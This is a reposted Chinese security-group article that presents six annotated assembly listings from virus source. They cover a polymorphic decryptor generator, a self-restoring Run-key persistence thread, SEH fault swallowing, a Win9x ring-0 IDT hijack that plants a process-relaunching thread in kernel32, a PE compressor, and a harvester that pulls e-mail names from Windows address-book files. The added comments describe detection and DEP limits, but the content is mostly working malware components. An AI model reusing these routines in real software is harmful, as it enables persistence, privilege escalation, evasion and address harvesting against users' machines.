
      病毒源碼解析之防御分析

      2019-09-06 23:33:18
      來源:轉載
      供稿:網友
      1、超級病毒變形引擎

      此段代碼會在DATA段內生成一個解密代碼。

      ; -----------------------------------------------------------------
      ; Section 1: random decryptor generator ("polymorphic engine").
      ; Syntax: TASM-style (extended `call proc,args`, `@@` labels) — assumed.
      ; Defensive reading: @@Start writes freshly chosen instruction bytes into
      ; the writable .data block at Encode and then executes them with
      ; `jmp DeCode`.  Code running from a writable data section is exactly
      ; what DEP/NX (W^X) stops on modern systems; the 0CCh (int 3) template
      ; separators and the explicit `int 3` before the jump also trap under a
      ; debugger, which makes the sample easy to catch in dynamic analysis.
      ; -----------------------------------------------------------------
      .586p
      .model flat,STDCALL
      extrn ExitProcess: proc            ; declared, never called in this listing
      VirusSize=100h                     ; byte count the generated loop processes (256)
      .data

      DecodeMethod dd ?                  ; 0 = xor variant, 1 = add variant (stored by @@Start)
      DeCode:                            ; entry of the generated decryptor (lives in .data)
      pushad
      call Encode                        ; pushes the address of the 11h block; the step-0 template reads it from [esp]
      db 100h dup(11h)                   ; placeholder "body" the generated loop transforms
      Encode:                            ; 256 bytes of int 3, overwritten with the generated code
      db 100h dup(0cch)
      RndReg0 dd 0 ; pointer register index 0..3 = eax,ebx,ecx,edx
      RndReg1 dd 0 ; counter register index, always != RndReg0 (see ChooseRegOk)
      RndCode dd 0 ; rotating selector; its low bit picks a template variant per step
      RndMima dd 60932561 ; 32-bit key patched into the step-2 template

      .code
      ; -----------------------------------------------------------------
      ; @@Start: builds one decryptor instance into Encode and runs it.
      ; Register roles in this run:
      ;   edi = write cursor inside Encode
      ;   esi = source template returned by GetBxCode
      ;   ebx = loop-top address (first byte after the step-1 template)
      ; Each ContFillStepN loop copies one template byte by byte up to and
      ; including its 0CCh terminator; `dec edi` then backs over the terminator
      ; so the next template overwrites it.
      ; Shape of the generated loop: 0 load pointer, 1 load count,
      ; 2 [pointer] op= key, 3 pointer += 4, 4 count -= 4, 5 jcc loop top, ret.
      ; -----------------------------------------------------------------
      @@Start:
      mov eax,RndMima
      ror eax,7                          ; derive the selector from the key
      mov RndCode,eax

      mov eax,RndCode
      mov ecx,eax
      and eax,011b                       ; RndReg0 = low two bits -> 0..3
      mov RndReg0,eax
      xor ecx,RndMima
      and ecx,011b                       ; RndReg1 candidate
      cmp eax,ecx
      jnz short ChooseRegOk
      inc ecx                            ; same register picked twice: take the next one (mod 4)
      and ecx,011b
      ChooseRegOk:
      mov RndReg1,ecx                    ; guaranteed != RndReg0 at this point


      mov edi,offset Encode              ; output cursor

      ror RndCode,1                      ; every step consumes one fresh low bit of RndCode
      call GetBxCode,0,RndReg0,RndCode   ; step 0: pointer register <- [esp]
      mov esi,eax
      ContFillStep0:
      cld
      lodsb
      stosb
      cmp al,0cch                        ; stop once the 0CCh terminator has been copied
      jnz ContFillStep0
      dec edi                            ; ...and back over it

      ror RndCode,1
      call GetBxCode,1,RndReg1,RndCode   ; step 1: counter register <- VirusSize
      mov esi,eax
      ContFillStep1:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep1
      dec edi

      mov ebx,edi ; loop-top address, used below to compute the jcc displacement

      ror RndCode,1
      call GetBxCode,2,RndReg0,RndCode   ; step 2: [pointer] xor/add imm32 (placeholder 12345678h)
      mov esi,eax
      ContFillStep2:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep2
      dec edi

      mov eax,RndMima
      mov [edi-4],eax ; patch the key over the imm32 just copied (last 4 bytes of the step-2 instruction)
      mov eax,RndCode
      and eax,01
      mov DecodeMethod,eax ; record which step-2 variant was chosen: 0 = xor, 1 = add (same bit GetBxCode used)

      ror RndCode,1
      call GetBxCode,3,RndReg0,RndCode   ; step 3: pointer += 4
      mov esi,eax
      ContFillStep3:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep3
      dec edi

      ror RndCode,1
      call GetBxCode,4,RndReg1,RndCode   ; step 4: counter -= 4
      mov esi,eax
      ContFillStep4:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep4
      dec edi

      ror RndCode,1
      call GetBxCode,5,RndReg0,RndCode   ; step 5: conditional jump back (flags come from the step-4 template)
      mov esi,eax
      ContFillStep5:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep5
      dec edi

      mov al,0c3h
      mov [edi],al ; append ret (0C3h); when executed it pops the address pushed by `call Encode`, i.e. continues into the transformed 11h block

      sub ebx,edi                        ; rel8 displacement = loop top - end of the jcc
      mov [edi-1],bl ; patch it over the `$` placeholder byte of the step-5 jump

      int 3;                             ; explicit breakpoint before running the result (debugger aid)

      jmp DeCode                         ; execute the generated decryptor
      ret                                ; not reached: the generated ret transfers into the 11h block, not back here
      ; -----------------------------------------------------------------
      ; GetBxCode(Step, Reg, Rnd) -> eax = address of one code template
      ; In:  Step 0..5 (loop stage), Reg 0..3 (eax,ebx,ecx,edx),
      ;      Rnd: only bit 0 is used, it picks one of two equivalent encodings
      ; Out: eax = first byte of the selected template; the template extends
      ;      up to (not including) the next 0CCh byte
      ; Table layout (Step0_Eax .. Step5_Edx): per step, the four registers in
      ; order eax,ebx,ecx,edx, two variants each, every variant terminated by
      ; `int 3` (0CCh).  Index = ((Step*4)+Reg)*2 + (Rnd&1).
      ; The table is never executed in place — `call GetBxCodeAddr` on entry
      ; jumps straight over it.  The scanner treats ANY 0CCh byte as a
      ; separator, so the scheme relies on no template encoding containing one.
      ; Placeholders the caller patches: 12345678h (step-2 key) and the `$`
      ; self-jump displacement (step 5).  Saves/restores ebx ecx edx esi edi.
      ; -----------------------------------------------------------------
      GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
      call GetBxCodeAddr                 ; pushes the address of Step0_Eax and skips the table
      ; --- step 0: pointer register <- dword at [esp] ---
      Step0_Eax:
      mov eax,[esp]
      int 3;
      pop eax
      push eax
      int 3;
      Step0_Ebx:
      pop ebx
      push ebx
      int 3;
      push dword ptr[esp]
      pop ebx
      int 3;
      Step0_Ecx:
      mov ecx,[esp]
      int 3;
      pop ecx
      push ecx
      int 3;
      Step0_Edx:
      mov edx,[esp]
      int 3;
      mov edx,esp
      mov edx,[edx]
      int 3

      ; --- step 1: counter register <- VirusSize (each variant nets to VirusSize) ---
      Step1_Eax:
      mov eax,VirusSize
      int 3
      sub eax,eax
      add ax,VirusSize+3081h
      sub ax,3081h
      int 3
      Step1_Ebx:
      mov ebx,VirusSize
      int 3;
      xor ebx,ebx
      or bx,VirusSize
      int 3;
      Step1_Ecx:
      sub ecx,ecx
      xor ecx,(VirusSize xor 3181h)
      xor ecx,(3181h)
      int 3;
      mov ecx,0
      and cx,VirusSize
      int 3
      Step1_Edx:
      and edx,0
      xor dx,(VirusSize-0281h)
      add dx,0281h
      int 3;
      xor edx,edx
      sub edx,(0181h-VirusSize)
      sub edx,-0181h
      int 3;

      ; --- step 2 ("Setp2", sic): [pointer] op= imm32; variant 0 = xor, 1 = add;
      ;     the imm32 is a placeholder the caller overwrites with the key ---
      Setp2_Eax:
      xor [eax],12345678h
      int 3
      add [eax],12345678h
      int 3
      Setp2_Ebx:
      xor [ebx],12345678h
      int 3;
      add [ebx],12345678h
      int 3;

      Setp2_Ecx:
      xor [ecx],12345678h
      int 3;
      add [ecx],12345678h
      int 3;
      Setp2_Edx:
      xor [edx],12345678h
      int 3;
      add [edx],12345678h
      int 3;
      ; --- step 3: pointer += 4 (each variant nets to +4) ---
      Step3_Eax:
      add eax,4
      int 3
      inc eax
      inc eax
      inc eax
      inc eax
      int 3;
      Step3_Ebx:
      add ebx,5
      dec ebx
      int 3
      add ebx,2
      add ebx,2
      int 3;
      Step3_Ecx:
      sub ecx,-4
      int 3
      sub ecx,-5
      dec ecx
      int 3;
      Step3_Edx:
      inc edx
      sub edx,-3
      int 3
      add edx,04
      int 3;

      ; --- step 4: counter -= 4 (each variant nets to -4); the flags left by
      ;     the last instruction are what the step-5 jump tests ---
      Step4_Eax:
      sub eax,4
      int 3
      dec eax
      dec eax
      dec eax
      sub eax,1
      int 3;
      Step4_Ebx:
      dec ebx
      sub ebx,3
      int 3;
      dec ebx
      dec ebx
      sub ebx,2
      int 3;
      Step4_Ecx:
      add cx,123
      sub cx,123+4
      int 3
      sub cx,-4
      dec cx
      sub cx,7
      int 3
      Step4_Edx:
      sub dx,2
      dec dx
      sub dx,1
      int 3
      inc edx
      sub dx,5
      int 3;
      ; --- step 5: conditional jump back; `$` is a placeholder rel8 that the
      ;     caller patches.  The Reg index only selects a jcc here; the flags it
      ;     tests come from the step-4 template chosen with the OTHER register ---
      Step5_Eax:
      jnz $
      int 3
      ja $
      int 3
      Step5_Ebx:
      jg $
      int 3
      jnb $
      int 3
      Step5_Ecx:
      jnl $
      int 3
      jnz $
      int 3
      Step5_Edx:
      ja $
      int 3
      jg $
      int 3

      ; Locate template number ((Step*4)+Reg)*2 + (Rnd&1) by counting 0CCh separators.
      GetBxCodeAddr:
      pop esi                            ; esi = address of Step0_Eax (our return address)
      mov al,0cch ; 0CCh (int 3) is the template separator
      mov ecx,Step
      shl ecx,1
      shl ecx,1                          ; ecx = Step*4
      add ecx,Reg ; ecx = Step*4 + Reg
      shl ecx,1                          ; two variants per register
      and Rnd,01b                        ; modifies the stack copy of the argument
      add ecx,Rnd                        ; ecx = number of separators to skip
      jcxz short GetBxCodeOver           ; index 0: the very first template (tests cx only; fine for this range)
      ContFindCode:
      push ecx                           ; preserve the outer count across the inner scan
      ContFindCC:
      inc esi                            ; first byte of Step0_Eax is never examined
      cmp [esi],al
      jnz ContFindCC                     ; advance to the next 0CCh
      pop ecx
      loop ContFindCode                  ; one separator per iteration
      mov eax,esi
      inc eax                            ; byte after the last separator skipped
      ret
      GetBxCodeOver:
      mov eax,esi
      ret
      GetBxCode endp


      end @@Start


      2、Windows 9x/2000/xp 鎖定注冊表

      ; -----------------------------------------------------------------
      ; Section 2: Run-key persistence plus a watcher thread that re-writes
      ; the value whenever it changes.  Defender note: the 'wap32' value under
      ; HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run is the artefact;
      ; because RegProtectProc restores it on every change notification, stop
      ; the process first and remove the value afterwards.
      ; -----------------------------------------------------------------
      .586p
      .model flat,STDCALL
      .data

      HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0 ; Run key path; the '\' separators appear to have been lost in this rendering of the listing
      ValueName db 'wap32',0             ; value name written under Run
      PathName db 'wap32.exe',0          ; value data: the program to start

      .code

      extrn RegOpenKeyA: proc
      extrn RegSetValueExA: proc
      extrn RegCloseKey: proc            ; declared, never called in this listing
      extrn ExitProcess: proc            ; declared, never called in this listing
      extrn RegNotifyChangeKeyValue: proc
      extrn CreateThread: proc
      extrn Sleep: proc
      extrn RegQueryValueExA: proc

      ; start: open HKLM, write the Run value, read it back, launch the watcher
      ; thread with the key handle, sleep three minutes, return.
      ; With stdcall's right-to-left pushes, an `esp` argument is pushed first
      ; and therefore points at the slot reserved just before the call.
      start:
      push eax                           ; slot that receives the opened key handle
      call RegOpenKeyA,080000002h,offset HKeyStr,esp ; 80000002h = HKEY_LOCAL_MACHINE; esp = &slot
      pop ebx                            ; ebx = hKey (return status is not checked)
      call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h ; type 1 = REG_SZ; cbData 100h copies far past the 10-byte PathName string

      sub esp,100h                       ; 256-byte buffer on the stack
      mov eax,esp
      push 100h                          ; cbData in/out
      call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp ; read the value back; the result is not used
      pop eax
      add esp,100h

      push eax                           ; slot for the thread id
      call CreateThread,0,0,offset RegProtectProc,ebx,0,esp ; watcher thread, parameter = hKey
      pop eax
      call Sleep,1000*60*3               ; keep the process alive for 3 minutes
      ret                                ; return from the entry point (the watcher thread is still running)

      ; RegProtectProc(hKey): watcher thread.  Takes one snapshot of the
      ; 'wap32' value, then loops forever: block in RegNotifyChangeKeyValue
      ; until a value under the key changes, write the snapshot back, repeat.
      ; Never returns, so the callee-saved ebx/esi/edi it clobbers and the 100h
      ; stack buffer are never restored.
      RegProtectProc proc hKey:dword
      mov ebx,hKey
      sub esp,100h                       ; 256-byte value buffer
      mov edi,esp
      call GetProtectKeyName             ; call/pop: esi = address of the inline string below
      db 'wap32',0
      GetProtectKeyName:
      pop esi
      push 100h                          ; cbData in/out
      call RegQueryValueExA,ebx,esi,0,0,edi,esp ; snapshot of the current value data
      pop eax
      WaitRegChangeNotify:
      call RegNotifyChangeKeyValue,ebx,0,4,0,0 ; bWatchSubtree=0, filter 4 = REG_NOTIFY_CHANGE_LAST_SET, no event -> blocks until a change
      call RegSetValueExA,ebx,esi,0,01,edi,100h ; put the snapshot back (type 1 = REG_SZ, 100h bytes)
      jmp short WaitRegChangeNotify
      RegProtectProc endp

      end start



      3、 Windows 9x/2000 意外處理通用程序


      此段程序可以達到屏蔽程序錯誤的效果

      ; -----------------------------------------------------------------
      ; Section 3: swallowing a fault with a hand-built SEH frame.
      ; The handler and its helpers are placed in .data (they precede `.code`),
      ; so this needs an executable data section; NT-family Windows with DEP
      ; and SafeSEH refuses such a handler.  `cx_Eip` and the `D` (dword ptr)
      ; shorthand presumably come from wap32.inc — not visible here.
      ; -----------------------------------------------------------------
      include wap32.inc

      .386p
      .model flat,stdcall

      extrn MessageBoxA: proc
      extrn ExitProcess: proc            ; declared, never called in this listing

      .data

      Msg db 'Fuck',0                    ; text and caption of the demo message box

      ; SetSehFrame: install an SEH record whose handler is Exception.
      ; In: ecx = address to resume at once a fault has been swallowed.
      ; Stack trick: `call PushExceptionProc` pushes the address of the
      ; `jmp short Exception` line, and that pushed dword then serves as the
      ; handler field of the record built right below it.
      ; On return the stack holds (top first): saved-esp, previous fs:[0],
      ; handler, resume address — exactly what ClearSehFrame unwinds.
      SetSehFrame: ; ecx = resume address used after a swallowed fault
      pop eax ; eax = caller's return address
      push ecx ; keep the resume address on the stack
      call PushExceptionProc
      jmp short Exception                ; never executed directly; its address is the handler pointer
      PushExceptionProc:
      push fs:dword ptr[0]               ; record = { prev, handler }
      mov fs:[0],esp                     ; link the new record in
      call GetEspAddr                    ; edx = address of the esp save slot
      push D [edx] ; save the previously stored esp
      mov [edx],esp                      ; remember the stack level the handler must restore
      jmp eax                            ; back to the caller (its return address was popped above)
      ClearSehFrame:
      pop eax ; eax = caller's return address
      call GetEspAddr
      mov esp,[edx]                      ; back to the level recorded by SetSehFrame
      pop D [edx] ; restore the previously stored esp
      pop fs:dword ptr[0]                ; unlink the record
      pop ecx                            ; discard the handler pointer
      pop ecx ; ecx = resume address (consumed by Exception's `jmp ecx`)
      jmp eax

      ; Exception(pRecord,pFrame,pContext,pDispatch): the SEH handler.
      ; PushSehBackProc pops its own return address (the `call ClearSehFrame`
      ; line) into ecx, stores it as the faulting context's Eip and returns 0
      ; (ExceptionContinueExecution).  The thread then resumes at
      ; `call ClearSehFrame`, which rewinds the stack and leaves the resume
      ; address in ecx; `jmp ecx` continues there.
      ; NOTE(review): the `ret` in PushSehBackProc is assumed to be expanded by
      ; the assembler into this proc's epilogue — confirm with the listing.
      Exception proc pRecord,pFrame,pContext,pDispatch
      call PushSehBackProc
      call ClearSehFrame                 ; reached only through the patched Eip
      jmp ecx                            ; ecx = resume address popped by ClearSehFrame
      PushSehBackProc:
      pop ecx                            ; ecx = address of the `call ClearSehFrame` above
      mov eax,pContext
      mov [eax.cx_Eip],ecx               ; cx_Eip: Eip field of CONTEXT, presumably from wap32.inc
      xor eax,eax ; 0 = ExceptionContinueExecution: dispatcher resumes at the modified Eip
      ret
      Exception endp

      ; GetEspAddr: returns edx = address of the `dd ?` slot embedded below.
      ; The slot stores the esp recorded by SetSehFrame; it is written at run
      ; time, which works only because this code sits in the writable .data.
      GetEspAddr:
      call PushOffsetEspAddr             ; pushes the slot's address as a return address
      dd ?                               ; saved-esp slot
      PushOffsetEspAddr:
      pop edx
      ret


      .code

      ; Start: demo of the frame.  PushErrorProc pops its own return address
      ; (the MessageBoxA call) into ecx as the resume point, installs the
      ; frame, then writes to address 0 on purpose.  The access violation is
      ; swallowed by Exception and execution continues at the MessageBoxA call;
      ; the `call ClearSehFrame`/`ret` after the write only run if it does not fault.
      Start:
      call PushErrorProc
      call MessageBoxA,0,offset Msg,offset Msg,0 ; resume point after the swallowed fault
      ret
      PushErrorProc:
      pop ecx                            ; ecx = resume address (the MessageBoxA call above)
      call SetSehFrame
      mov ds:[0],eax                     ; deliberate write to address 0 -> access violation
      call ClearSehFrame                 ; not reached on the fault path
      ret


      end Start



      4、Windows 9x 下進程不死術

      此段程序首先實現Win9x下注射遠程線程(新技術)
      然后與Win2k下進程不死術一樣了。
      ; -----------------------------------------------------------------
      ; Section 4: Win9x-only.  Copies a thread routine into the shared
      ; kernel32 region (fixed base 0BFF70000h) by redirecting the int 3 IDT
      ; gate from ring 3, then starts it with the undocumented
      ; CreateKernelThread export.  Defender note: none of this works on
      ; NT-family Windows — `cli` and a writable IDT are unavailable from ring 3,
      ; and kernel32 is neither at a fixed address nor shared across processes.
      ; PROCESS_ALL_ACCESS and FALSE are expected to come from Win32.inc.
      ; -----------------------------------------------------------------
      include Win32.inc

      .386p
      .model flat,stdcall

      extrn GetProcAddress: proc
      extrn WinExec: proc                ; declared; the copied routine calls WinExec through a resolved pointer instead
      extrn MessageBoxA: proc
      extrn Sleep: proc                  ; declared, never called here (see the author's note above KnlThread)
      extrn GetCurrentProcessId: proc
      extrn OpenProcess: proc
      extrn GetCurrentProcess: proc      ; declared, never called here
      extrn WriteProcessMemory: proc     ; declared, never called here
      extrn GetExitCodeProcess: proc     ; declared, never called here

      .data

      ; Author's note (translated): problem — a Sleep() is needed so that Kernel32 gets a chance to update its data.
      ; KnlThread(ProcID): the routine meant to run as a kernel thread from the
      ; kernel32 copy.  Written position-independently: each API pointer it
      ; needs is an inline dword located via call/pop and filled in by Start.
      ; Opens ProcID, waits for that process to exit, then WinExec's FileName
      ; (addressed relative to the code) — i.e. it restarts the watched program.
      KnlThread proc ProcID:dword
      call GetKnlOpenProcess             ; pushes &KnlOpenProcess
      KnlOpenProcess dd ?                ; filled by Start with OpenProcess
      GetKnlOpenProcess:
      pop eax
      call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID ; OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcID)
      or eax,eax
      jz short ExitProtectProc           ; could not open the process: give up
      mov ebx,eax                        ; ebx = process handle
      call GetKnlWaitForSingleObject
      KnlWaitForSingleObject dd ?        ; filled by Start with WaitForSingleObject
      GetKnlWaitForSingleObject:
      pop eax
      call [eax],ebx,-1h                 ; WaitForSingleObject(handle, INFINITE): block until the process ends
      call GetFileNameAddress            ; call/pop: ecx = address of GetFileNameAddress
      GetFileNameAddress:
      pop ecx
      add ecx,offset FileName-offset GetFileNameAddress ; ecx = FileName, valid wherever this copy runs as long as FileName was copied with it
      call GetKnlWinExec
      KnlWinExec dd ?                    ; filled by Start with WinExec
      GetKnlWinExec:
      pop eax
      call [eax],ecx,01                  ; WinExec(FileName, SW_SHOWNORMAL)
      ExitProtectProc:
      ret
      KnlThread endp

      FileName db 'c:wap32.exe',0        ; program to relaunch (the '\' after 'c:' appears lost in this rendering); also the message-box text in Start

      KnlOpenProcessStr db 'OpenProcess',0 ; export names resolved with GetProcAddress in Start
      KnlWaitForObjectStr db 'WaitForSingleObject',0
      KnlWinExecStr db 'WinExec',0
      KnlSleepStr db 'Sleep',0           ; not resolved in this listing
      KnlCreateKnlThreadStr db 'CreateKernelThread',0 ; undocumented Win9x kernel32 export (assumed)

      .code

      ; Start: resolve the three APIs KnlThread uses against the fixed Win9x
      ; kernel32 base and store them into KnlThread's inline slots; copy 100h
      ; bytes to 0BFF70600h through MoveDataToKnl; create a kernel thread at
      ; that address with our own process id as its argument; show a box.
      ; NOTE(review): the copy source is `offset Start` (this entry point)
      ; rather than the routine whose inline slots were just filled; whether
      ; that is intended cannot be told from this listing.
      Start:
      call GetProcAddress,0bff70000h,offset KnlOpenProcessStr ; 0BFF70000h = kernel32 base on Win9x (fixed, shared)
      mov KnlOpenProcess,eax
      call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
      mov KnlWaitForSingleObject,eax
      call GetProcAddress,0bff70000h,offset KnlWinExecStr
      mov KnlWinExec,eax

      call MoveDataToKnl,offset Start,0bff70600h,100h ; ring-0 copy into the shared kernel32 page

      call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
      mov ebx,eax                        ; ebx = CreateKernelThread (CreateThread-like argument list assumed)
      call GetCurrentProcessId
      push eax                           ; slot for the thread id
      call ebx,0,0,0bff70000h+600h,eax,0,esp ; (security=0, stack=0, start=copy address, param=our pid, flags=0, &id)
      pop eax
      call MessageBoxA,0,offset FileName,offset FileName,0
      ret

      ; MoveDataToKnl(Src, Des, nCx): copy nCx bytes with ring-0 privileges
      ; (Win9x).  Reads the IDT base with sidt, saves the int 3 gate (vector 3,
      ; 8 bytes per descriptor), points the gate's offset at the `pushad` below,
      ; executes `int 3` so the copy runs in ring 0, restores the gate from
      ; inside the handler and `iret`s back.  Clobbers eax, edx; ebx/esi/edi are
      ; saved by `uses`.  Relies on `sidt`/`cli` being tolerated from ring 3 and
      ; on a user-writable IDT — Win9x behaviour only.
      MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
      push eax
      sidt [esp-2]                       ; 6-byte IDTR: limit at esp-2, base at esp..esp+3
      pop eax                            ; eax = IDT base
      add eax,3*8                        ; eax = gate descriptor for vector 3 (int 3)
      mov ebx,[eax]                      ; save the original gate, low and high dword
      mov edx,[eax+4]
      call SetIdt03                      ; pushes the address of `pushad` as its return address
      pushad                             ; entered in ring 0 through the patched gate
      mov [eax],ebx                      ; restore the original gate first
      mov [eax+4],edx
      cld
      rep movsb                          ; the privileged copy: esi=Src, edi=Des, ecx=nCx
      popad
      iret                               ; back to ring 3, right after the `int 3` below
      SetIdt03:
      cli
      pop W[eax]                         ; low word of the return address -> gate offset bits 15:0
      pop W[eax+6]                       ; high word -> gate offset bits 31:16 (selector/attributes untouched)
      mov esi,Src
      mov edi,Des
      mov ecx,nCx
      int 3;                             ; trap through the patched gate into `pushad`
      sti
      ret                                ; proc epilogue: the call's return address was consumed by the two pops above
      MoveDataToKnl endp

      end Start


      5、簡單算法,高效率壓縮PE文件

      ; -----------------------------------------------------------------
      ; Section 5: zero-run compression of a file, one byte at a time.
      ; Output format: a non-zero byte is copied through unchanged; a run of N
      ; zero bytes (1 <= N <= 0FFh) becomes the two bytes 00h, N.  Longer runs
      ; are split at 0FFh.  Because a literal zero is always emitted as 00h N,
      ; the stream is unambiguous.  Uses the Win16-era _lopen/_lread/_lwrite API.
      ; -----------------------------------------------------------------
      .586p
      .model flat,STDCALL
      .data

      OldFile db 'pe.exe',0              ; input
      NewFile db 'pe.zzz',0              ; output

      FileData db 0,0                    ; 2-byte I/O scratch: [0] = last byte read, [0..1] = pair to write
      .code
      extrn _lopen: proc,_lcreat: proc
      extrn _lread: proc,_lwrite: proc
      extrn _lclose: proc
      extrn ExitProcess: proc
      ; Register roles: esi = input HFILE, edi = output HFILE,
      ; ebx = zero bytes seen but not yet written (0..0FFh).
      start:
      call _lopen,offset OldFile,0       ; 0 = OF_READ
      cmp eax,-1                         ; HFILE_ERROR
      jz ExitProc
      mov esi,eax
      call _lcreat,offset NewFile,0      ; attribute 0 = normal file
      cmp eax,-1
      jz CloseOldFile
      mov edi,eax

      xor ebx,ebx                        ; no pending zeros
      ReadData:
      call _lread,esi,offset FileData,1  ; one byte per call
      or eax,eax
      jz short ReadOver                  ; 0 bytes read = EOF (an error return of -1 is not distinguished from data)
      movzx eax,FileData
      or eax,eax
      jnz short NoZero
      inc ebx                            ; another zero: just count it
      cmp ebx,0ffh
      jnz short ReadData
      xor eax,eax                        ; run reached 0FFh: flush 00h,0FFh now
      mov ah,bl
      xchg ax,word ptr FileData          ; FileData = 00h, count (little-endian word; old contents unused)
      call _lwrite,edi,offset FileData,2
      xor ebx,ebx
      jmp short ReadData
      NoZero:
      or ebx,ebx
      jnz short NoZeroData
      call _lwrite,edi,offset FileData,1 ; no pending run: copy the byte through
      jmp short ReadData
      NoZeroData:
      push eax                           ; keep the non-zero byte while the pending run is flushed
      xor eax,eax
      mov ah,bl
      mov word ptr FileData,ax           ; FileData = 00h, count
      call _lwrite,edi,offset FileData,2
      xor ebx,ebx
      pop eax
      mov FileData,al                    ; then the byte itself
      call _lwrite,edi,offset FileData,1
      jmp ReadData
      ReadOver:
      or ebx,ebx
      jz short CloseFile
      xor eax,eax                        ; flush a run still pending at EOF
      mov ah,bl
      xchg ax,word ptr FileData
      call _lwrite,edi,offset FileData,2
      xor ebx,ebx
      CloseFile:
      call _lclose,edi
      CloseOldFile:
      call _lclose,esi
      ExitProc:
      call ExitProcess,0

      end start

      6、提取Windows地址薄文件(*.WAB)的Email信息

      ; -----------------------------------------------------------------
      ; Section 6: walks a Windows Address Book (*.WAB) file and displays each
      ; stored e-mail name.  Defender note: opening .WAB files and converting
      ; their UTF-16 entries is a classic address-harvesting indicator.
      ; The header offsets 60h/64h and the 44h record size are the author's
      ; reading of the WAB layout and are not verified here.
      ; -----------------------------------------------------------------
      .586p
      .model flat,STDCALL
      .data

      MailFile db 'My.WAB',0             ; input address book

      .code

      extrn _lopen: proc,_lcreat: proc   ; _lcreat, _lwrite declared but unused here
      extrn _lread: proc,_lwrite: proc
      extrn _llseek: proc
      extrn _lclose: proc
      extrn MessageBoxA: proc
      extrn ExitProcess: proc
      extrn WideCharToMultiByte: proc

      ; Register roles: ebx = file handle, edi = 100h stack buffer (the header,
      ; then one record at a time), ecx = remaining record count.
      start:
      call _lopen,offset MailFile,0      ; 0 = OF_READ
      cmp eax,-1                         ; HFILE_ERROR
      jz short ExitProc
      mov ebx,eax
      sub esp,100h                       ; 256-byte buffer
      mov edi,esp
      call _lread,ebx,edi,100h           ; read the header
      cmp eax,100h
      jnz short CloseFile                ; short read: not usable
      mov eax,[edi+60h] ; file offset of the Unicode mail-name table (author's layout)
      call _llseek,ebx,eax,0             ; 0 = FILE_BEGIN
      mov ecx,[edi+64h] ; number of entries (author's layout); a count of 0 makes `loop` below wrap and run ~2^32 times
      ContWabMail:
      push ecx                           ; ecx is clobbered by the calls below
      call _lread,ebx,edi,44h ; read one 44h-byte record
      cmp eax,44                         ; decimal 44, and no branch consumes this comparison
      sub esp,100h                       ; conversion buffer
      mov eax,esp
      call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0 ; CP_ACP, flags 200h (WC_COMPOSITECHECK), NUL-terminated wide input -> 100h-byte buffer
      mov eax,esp
      call MessageBoxA,0,eax,eax,0       ; show the converted name
      add esp,100h
      pop ecx
      loop short ContWabMail
      CloseFile:
      call _lclose,ebx
      ExitProc:
      call ExitProcess,0

      end start



      WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力于各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。
      WSS 主頁:http://www.whitecell.org/
      WSS 論壇:http://www.whitecell.org/forum/